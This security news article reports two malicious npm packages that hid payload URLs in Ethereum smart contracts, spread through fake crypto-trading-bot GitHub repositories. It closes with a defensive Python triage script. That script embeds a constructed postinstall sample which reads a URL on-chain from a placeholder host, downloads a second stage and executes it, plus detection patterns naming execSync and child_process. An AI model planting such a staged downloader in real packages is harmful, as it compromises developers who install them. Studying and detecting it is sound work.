Cybersecurity researchers have recently uncovered two malicious packages on the npm registry that leverage smart contracts on the Ethereum blockchain to perform harmful actions on compromised systems. This discovery highlights an alarming trend in which threat actors continually seek innovative methods to distribute malware while avoiding detection.
According to ReversingLabs researcher Lucija Valentić, the malicious packages were designed to hide harmful commands that install downloader malware on affected systems. Both packages were uploaded to the npm registry in July 2025 and have since been removed.
ReversingLabs described these packages as being part of a more extensive and organized campaign that impacts both npm and GitHub, targeting unsuspecting developers who inadvertently download and execute them. While the packages themselves do not attempt to disguise their malicious nature, the associated GitHub projects have been crafted to appear genuine and credible.
The malicious behavior is triggered once these packages are used or imported into other projects, at which point they retrieve a next-stage payload from an attacker-controlled server. What sets them apart from conventional malware downloaders is their use of Ethereum smart contracts to stage the URLs that host the payloads, a method reminiscent of the EtherHiding technique. This shift reflects the evolving tactics cybercriminals use to evade detection.
Further investigation revealed that the malicious packages are linked to a network of GitHub repositories posing as a solana-trading-bot-v2, which purports to use "real-time on-chain data to execute trades automatically." The GitHub account behind this repository has since been taken down.
Experts believe that these accounts are part of a distribution-as-a-service (DaaS) scheme known as Stargazers Ghost Network: a cluster of fake GitHub accounts used to boost the apparent legitimacy of malicious repositories by starring, forking, and subscribing to them.
Among the many repositories involved in disseminating the npm packages are those related to cryptocurrency trading, including ethereum-mev-bot-v2, arbitrage-bot, and hyperliquid-trading-bot. The naming conventions of these GitHub repositories indicate that the primary targets of this campaign are developers and users within the cryptocurrency space, relying on a combination of social engineering and deception.
Valentić emphasized the need for developers to vigilantly evaluate libraries before integrating them into their projects. This involves not only examining the packages themselves but also looking into the reputations and histories of their maintainers. The focus should extend beyond superficial metrics such as the number of downloads or commits to determine whether a package and its developers authentically represent what they claim.
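To make that vetting concrete, the following added example (not ReversingLabs' tooling or the actual packages' code) implements a small static triage heuristic for an npm package: it flags install-time lifecycle hooks and, in the sources, the combination the article describes (reading data from a blockchain RPC, fetching a remote resource, and executing code). The package contents and regexes below are constructed for the demonstration.

```python
"""Heuristic static triage of an npm package for the risk signals described
above. Added example; the manifests, sources and patterns are constructed."""
import json
import re
from typing import Dict, List

# Lifecycle scripts npm runs automatically during `npm install`. A package that
# has no native build step yet defines one of these deserves a closer look.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Behaviour patterns (assumed regexes for a triage heuristic, not real signatures).
PATTERNS = {
    "blockchain_read": re.compile(r"\b(ethers|web3|JsonRpcProvider|eth_call)\b"),
    "remote_fetch": re.compile(r"\b(fetch|axios|https?)\s*[.(]"),
    "dynamic_exec": re.compile(r"\b(eval|child_process|execSync|spawn|new Function)\b"),
}

def triage_package(package_json: str, sources: Dict[str, str]) -> dict:
    """Score a package from its manifest and source files; return the findings."""
    manifest = json.loads(package_json)
    findings: List[str] = []
    score = 0

    for hook in INSTALL_HOOKS:
        cmd = manifest.get("scripts", {}).get(hook)
        if cmd:
            findings.append(f"install hook {hook!r} runs: {cmd}")
            score += 2

    for path, code in sources.items():
        hits = {name for name, rx in PATTERNS.items() if rx.search(code)}
        for name in sorted(hits):
            findings.append(f"{path}: {name}")
            score += 1
        # The EtherHiding-style chain: resolve a location on-chain, download, execute.
        if {"blockchain_read", "remote_fetch", "dynamic_exec"} <= hits:
            findings.append(f"{path}: reads chain data, downloads and executes "
                            "(staged-downloader pattern)")
            score += 3

    return {"score": score, "findings": findings,
            "verdict": "review" if score >= 5 else "low"}

# Constructed sample resembling the behaviour described (zero address and
# .invalid RPC host are placeholders, not real infrastructure).
SUSPICIOUS_MANIFEST = json.dumps({
    "name": "demo-trading-helper", "version": "1.0.0",
    "scripts": {"postinstall": "node setup.js"},
})
SUSPICIOUS_SOURCES = {"setup.js": """
const { JsonRpcProvider, Contract } = require('ethers');
const { execSync } = require('child_process');
async function run() {
  const provider = new JsonRpcProvider('https://rpc.example.invalid');
  const c = new Contract('0x0000000000000000000000000000000000000000',
                         ['function url() view returns (string)'], provider);
  const url = await c.url();                 // payload location held on-chain
  const body = await (await fetch(url)).text();
  require('fs').writeFileSync('stage2.js', body);
  execSync('node stage2.js');
}
run();
"""}

# Constructed benign package for contrast.
BENIGN_MANIFEST = json.dumps({"name": "pad-demo", "version": "0.1.0",
                              "scripts": {"test": "node test.js"}})
BENIGN_SOURCES = {"index.js": "module.exports = (s, n) => s.padStart(n);\n"}

if __name__ == "__main__":
    for label, m, s in (("suspicious", SUSPICIOUS_MANIFEST, SUSPICIOUS_SOURCES),
                        ("benign", BENIGN_MANIFEST, BENIGN_SOURCES)):
        result = triage_package(m, s)
        print(label, result["verdict"], result["score"])
        for f in result["findings"]:
            print("  -", f)
```

The heuristic is deliberately coarse: a legitimate blockchain client library will trip `blockchain_read` on its own, so the weight sits on the combination of signals and on install hooks, and a "review" verdict is a prompt to read the code and the maintainer history, not a conviction.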